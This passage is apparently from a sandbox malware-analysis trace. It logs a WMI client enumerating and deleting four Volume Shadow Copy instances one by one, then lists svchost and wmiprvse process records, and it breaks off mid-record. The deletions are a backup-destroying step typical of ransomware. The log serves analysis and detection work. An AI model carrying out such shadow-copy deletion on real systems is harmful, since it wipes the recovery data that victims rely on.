_File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0234.544] free (_Block=0x37dca0) [0234.544] free (_Block=0x37d490) [0234.544] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0234.546] malloc (_Size=0x18) returned 0x37bfb0 [0234.547] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0234.547] free (_Block=0x37bfb0) [0234.547] malloc (_Size=0x800) returned 0x37d490 [0234.547] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0234.547] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="쟠\x15") returned 0x67 [0234.547] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0234.547] malloc (_Size=0x68) returned 0x37dca0 [0234.547] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0234.547] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0234.547] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0234.547] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0234.547] free (_Block=0x37dca0) [0234.547] free (_Block=0x37d490) [0234.547] LocalFree (hMem=0x15c7e0) returned 0x0 [0234.547] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0235.731] IUnknown:Release (This=0x1d03d80) returned 0x0 [0235.731] malloc (_Size=0x800) returned 0x37d490 [0235.731] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0235.731] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0235.731] malloc (_Size=0x20) returned 0x37dca0 [0235.732] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0235.732] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0235.732] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0235.732] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0235.732] free (_Block=0x37dca0) [0235.732] free (_Block=0x37d490) [0235.732] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0235.733] malloc (_Size=0x18) returned 0x37bfb0 [0235.733] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0235.733] free (_Block=0x37bfb0) [0235.733] malloc (_Size=0x800) returned 0x37d490 [0235.733] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0235.733] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="쟠\x15") returned 0x67 [0235.733] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0235.733] malloc (_Size=0x68) returned 0x37dca0 [0235.733] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0235.733] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0235.734] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0235.734] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0235.734] free (_Block=0x37dca0) [0235.734] free (_Block=0x37d490) [0235.734] LocalFree (hMem=0x15c7e0) returned 0x0 [0235.734] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0236.726] IUnknown:Release (This=0x1d03d80) returned 0x0 [0236.726] malloc (_Size=0x800) returned 0x37d490 [0236.726] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0236.726] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0236.726] malloc (_Size=0x20) returned 0x37dca0 [0236.726] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0236.726] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0236.726] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0236.726] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0236.726] free (_Block=0x37dca0) [0236.726] free (_Block=0x37d490) [0236.726] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0236.728] malloc (_Size=0x18) returned 0x37bfb0 [0236.728] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0236.728] free (_Block=0x37bfb0) [0236.728] malloc (_Size=0x800) returned 0x37d490 [0236.728] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0236.728] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="쟠\x15") returned 0x67 [0236.728] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0236.728] malloc (_Size=0x68) returned 0x37dca0 [0236.728] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0236.729] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0236.729] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0236.729] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0236.729] free (_Block=0x37dca0) [0236.729] free (_Block=0x37d490) [0236.729] LocalFree (hMem=0x15c7e0) returned 0x0 [0236.729] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0237.700] IUnknown:Release (This=0x1d03d80) returned 0x0 [0237.700] malloc (_Size=0x800) returned 0x37d490 [0237.700] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0237.700] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0237.700] malloc (_Size=0x20) returned 0x37dca0 [0237.700] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0237.700] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0237.700] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0237.700] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0237.700] free (_Block=0x37dca0) [0237.700] free (_Block=0x37d490) [0237.700] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0237.701] malloc (_Size=0x18) returned 0x37bfb0 [0237.701] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0237.702] free (_Block=0x37bfb0) [0237.702] malloc (_Size=0x800) returned 0x37d490 [0237.702] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0237.702] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="쟠\x15") returned 0x67 [0237.702] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0237.702] malloc (_Size=0x68) returned 0x37dca0 [0237.702] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0237.702] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0237.702] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0237.702] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0237.702] free (_Block=0x37dca0) [0237.702] free (_Block=0x37d490) [0237.702] LocalFree (hMem=0x15c7e0) returned 0x0 [0237.702] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0237.978] IUnknown:Release (This=0x1d03d80) returned 0x0 [0237.978] malloc (_Size=0x800) returned 0x37d490 [0237.978] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0237.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0237.978] malloc (_Size=0x20) returned 0x37dca0 [0237.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0237.978] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0237.978] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0237.978] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0237.978] free (_Block=0x37dca0) [0237.978] free (_Block=0x37d490) [0237.978] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x0, puReturned=0x26f780*=0x0) returned 0x1 [0237.980] IUnknown:Release (This=0x1d03d18) returned 0x0 [0237.982] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0237.982] free (_Block=0x37bf10) [0237.982] free (_Block=0x37beb0) [0237.982] GetCurrentThreadId () returned 0xb18 [0237.982] ??0CHString@@QEAA@PEBG@Z () returned 0x26f948 [0237.982] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26f948 [0237.982] lstrlenW (lpString="LIST") returned 4 [0237.982] lstrlenW (lpString="DELETE") returned 6 [0237.982] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0237.982] lstrlenW (lpString="ASSOC") returned 5 [0237.982] lstrlenW (lpString="DELETE") returned 6 [0237.982] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0237.982] lstrlenW (lpString="GET") returned 3 [0237.982] lstrlenW (lpString="DELETE") returned 6 [0237.982] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0237.982] ??1CHString@@QEAA@XZ () returned 0x70db3c01 [0237.982] WbemLocator:IUnknown:Release (This=0x1d03c18) returned 0x0 [0237.997] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0237.999] _kbhit () returned 0x0 [0238.002] free (_Block=0x37cc70) [0238.002] free (_Block=0x37bdb0) [0238.002] free (_Block=0x37bd90) [0238.002] free (_Block=0x37bd70) [0238.002] free (_Block=0x37bd50) [0238.003] free (_Block=0x376fa0) [0238.003] free (_Block=0x37be50) [0238.003] free (_Block=0x3785c0) [0238.003] free (_Block=0x37bed0) [0238.003] free (_Block=0x37cbf0) [0238.003] free (_Block=0x37be70) [0238.003] free (_Block=0x37bef0) [0238.003] free (_Block=0x379080) [0238.003] free (_Block=0x376f50) [0238.003] free (_Block=0x37cc40) [0238.003] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0238.003] free (_Block=0x379050) [0238.003] free (_Block=0x37bdf0) [0238.003] free (_Block=0x37be10) [0238.003] free (_Block=0x377ee0) [0238.003] free (_Block=0x377f30) [0238.003] free (_Block=0x377f80) [0238.003] free (_Block=0x37bdd0) [0238.003] free (_Block=0x376770) [0238.003] free (_Block=0x376f30) [0238.003] free (_Block=0x378040) [0238.004] free (_Block=0x376b10) [0238.004] free (_Block=0x378000) [0238.004] free (_Block=0x376ab0) [0238.004] free (_Block=0x376ad0) [0238.004] free (_Block=0x376990) [0238.004] free (_Block=0x3769b0) [0238.004] free (_Block=0x376930) [0238.004] free (_Block=0x376950) [0238.004] free (_Block=0x3769f0) [0238.004] free (_Block=0x376a10) [0238.004] free (_Block=0x376a50) [0238.004] free (_Block=0x376a70) [0238.004] free (_Block=0x376870) [0238.004] free (_Block=0x376890) [0238.005] free (_Block=0x376810) [0238.005] free (_Block=0x376830) [0238.005] free (_Block=0x3768d0) [0238.005] free (_Block=0x3768f0) [0238.005] free (_Block=0x3767b0) [0238.005] free (_Block=0x3767d0) [0238.005] free (_Block=0x376720) [0238.005] free (_Block=0x3766d0) [0238.005] free (_Block=0x37cb60) [0238.005] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x2 [0238.005] WbemLocator:IUnknown:Release (This=0x1d03b28) returned 0x0 [0238.006] WbemLocator:IUnknown:Release (This=0x1d03a98) returned 0x0 [0238.007] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x1 [0238.007] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0238.007] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x0 [0238.007] free (_Block=0x37bcd0) [0238.008] free (_Block=0x37bcf0) [0238.008] free (_Block=0x378540) [0238.008] free (_Block=0x37bd10) [0238.008] free (_Block=0x37bd30) [0238.008] free (_Block=0x378580) [0238.008] free (_Block=0x37bb50) [0238.008] free (_Block=0x37bb70) [0238.008] free (_Block=0x3783c0) [0238.008] free (_Block=0x37bb90) [0238.008] free (_Block=0x37bbb0) [0238.008] free (_Block=0x378400) [0238.008] free (_Block=0x37bad0) [0238.008] free (_Block=0x37baf0) [0238.008] free (_Block=0x378340) [0238.008] free (_Block=0x37bb10) [0238.008] free (_Block=0x37bb30) [0238.009] free (_Block=0x378380) [0238.009] free (_Block=0x37bc50) [0238.009] free (_Block=0x37bc70) [0238.009] free (_Block=0x3784c0) [0238.009] free (_Block=0x37bc90) [0238.009] free (_Block=0x37bcb0) [0238.009] free (_Block=0x378500) [0238.009] free (_Block=0x37ba50) [0238.009] free (_Block=0x37ba70) [0238.009] free (_Block=0x3782c0) [0238.009] free (_Block=0x37ba90) [0238.009] free (_Block=0x37bab0) [0238.009] free (_Block=0x378300) [0238.009] free (_Block=0x37bbd0) [0238.009] free (_Block=0x37bbf0) [0238.009] free (_Block=0x378440) [0238.009] free (_Block=0x37bc10) [0238.009] free (_Block=0x37bc30) [0238.009] free (_Block=0x378480) [0238.009] free (_Block=0x37b990) [0238.009] free (_Block=0x37b9b0) [0238.009] free (_Block=0x378200) [0238.009] free (_Block=0x37b850) [0238.010] free (_Block=0x37b870) [0238.010] free (_Block=0x3780c0) [0238.010] free (_Block=0x37b810) [0238.010] free (_Block=0x37b830) [0238.010] free (_Block=0x378080) [0238.010] free (_Block=0x37b8d0) [0238.010] free (_Block=0x37b8f0) [0238.010] free (_Block=0x378140) [0238.010] free (_Block=0x37b9d0) [0238.010] free (_Block=0x37b9f0) [0238.010] free (_Block=0x378240) [0238.010] free (_Block=0x37b890) [0238.010] free (_Block=0x37b8b0) [0238.010] free (_Block=0x378100) [0238.010] free (_Block=0x37b910) [0238.010] free (_Block=0x37b930) [0238.010] free (_Block=0x378180) [0238.010] free (_Block=0x37b950) [0238.010] free (_Block=0x37b970) [0238.010] free (_Block=0x3781c0) [0238.010] free (_Block=0x37ba10) [0238.010] free (_Block=0x37ba30) [0238.011] free (_Block=0x378280) [0238.011] CoUninitialize () [0238.274] exit (_Code=0) [0238.274] free (_Block=0x378fd0) [0238.274] free (_Block=0x377d90) [0238.274] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0238.274] free (_Block=0x3790a0) [0238.274] free (_Block=0x376790) [0238.274] free (_Block=0x377d50) [0238.274] free (_Block=0x377d10) [0238.275] free (_Block=0x377cc0) [0238.275] free (_Block=0x377c80) [0238.275] free (_Block=0x375ac0) [0238.275] free (_Block=0x377c00) [0238.275] free (_Block=0x375a80) [0238.275] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0238.275] free (_Block=0x37be30) Thread: id = 27 os_tid = 0xb6c Thread: id = 28 os_tid = 0x5f4 Thread: id = 29 os_tid = 0x5e4 Thread: id = 30 os_tid = 0xb10 Thread: id = 31 os_tid = 0xba0 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 32 os_tid = 0x7b0 Thread: id = 33 os_tid = 0x534 Thread: id = 34 os_tid = 0x318 Thread: id = 35 os_tid = 0x6fc Thread: id = 36 os_tid = 0x788 Thread: id = 37 os_tid = 0x320 Thread: id = 38 os_tid = 0x42c Thread: id = 39 os_tid = 0x1e4 Thread: id = 40 os_tid = 0x6d0 Thread: id = 41 os_tid = 0x6bc Thread: id = 42 os_tid = 0x6b0 Thread: id = 43 os_tid = 0x6a8 Thread: id = 44 os_tid = 0x698 Thread: id = 45 os_tid = 0x684 Thread: id = 46 os_tid = 0x678 Thread: id = 47 os_tid = 0x4a8 Thread: id = 48 os_tid = 0x46c Thread: id = 49 os_tid = 0x44c Thread: id = 50 os_tid = 0x424 Thread: id = 51 os_tid = 0x41c Thread: id = 52 os_tid = 0x404 Thread: id = 53 os_tid = 0x14c Thread: id = 54 os_tid = 0x3fc Thread: id = 55 os_tid = 0x3f4 Thread: id = 56 os_tid = 0x3e8 Thread: id = 57 os_tid = 0x39c Thread: id = 58 os_tid = 0x390 Thread: id = 59 os_tid = 0x38c Thread: id = 60 os_tid = 0x37c Thread: id = 61 os_tid = 0x374 Thread: id = 78 os_tid = 0xb08 Thread: id = 79 os_tid = 0xadc Thread: id = 108 os_tid = 0x15c Thread: id = 109 os_tid = 0xb4c Thread: id = 112 os_tid = 0x5b8 Thread: id = 132 os_tid = 0xaf0 Thread: id = 133 os_tid = 0x524 Thread: id = 134 os_tid = 0x658 Thread: id = 139 os_tid = 0xb20 Thread: id = 140 os_tid = 0x38c Thread: id = 141 os_tid = 0x3c4 Thread: id = 142 os_tid = 0x6a8 Thread: id = 143 os_tid = 0x320 Thread: id = 229 os_tid = 0xa90 Thread: id = 258 os_tid = 0x72c Thread: id = 259 os_tid = 0x5d0 Thread: id = 260 os_tid = 0x10c Thread: id = 261 os_tid = 0x36c Thread: id = 278 os_tid = 0xa48 Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x60d6b000" os_pid = "0xa64" os_integrity_level = 